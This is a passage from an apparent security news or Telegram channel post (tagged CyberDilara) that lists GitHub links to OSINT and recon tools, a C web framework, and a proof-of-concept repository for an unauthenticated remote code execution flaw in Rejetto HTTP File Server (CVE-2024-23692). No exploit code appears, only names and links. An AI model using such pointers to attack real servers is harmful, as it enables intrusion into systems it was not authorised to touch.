assistant that can be useful in your traditional OSINT processes.\n\nhttps://github.com/luijait/DarkGPT\n\nOSINT tool to crawl a site and extract useful recon info.\n\nhttps://github.com/chm0dx/creepyCrawler\n\nWrite and deploy websites using the C Programming Language.\n\nhttps://github.com/KDesp73/webc\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-09-21T12:35:29.000000Z"}]}